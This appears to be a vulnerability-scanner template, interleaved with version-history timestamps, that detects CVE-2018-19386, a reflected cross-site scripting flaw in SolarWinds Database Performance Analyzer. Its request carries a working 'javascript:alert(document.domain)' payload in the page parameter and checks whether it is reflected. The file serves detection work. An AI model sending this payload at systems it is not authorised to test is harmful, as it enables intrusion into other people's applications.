2021-01-02 05:00:39 +00:00
id : CVE-2018-19386
2020-09-09 01:45:42 +00:00
info :
2022-09-08 13:28:46 +00:00
name : SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
2020-09-09 01:45:42 +00:00
author : pikpikcu
severity : medium
2022-09-08 13:28:46 +00:00
description : SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://i.imgur.com/Y7t2AD6.png
- https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-19386
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-19386
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00205
cpe : cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : solarwinds
product : database_performance_analyzer
tags : cve,cve2018,solarwinds,xss
2020-09-09 01:45:42 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-09-09 01:45:42 +00:00
- method : GET
path :
2020-10-15 18:50:10 +00:00
- "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"
2020-09-09 01:45:42 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-09-08 13:28:46 +00:00
- '<a href="javascript:alert(document.domain)//'
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200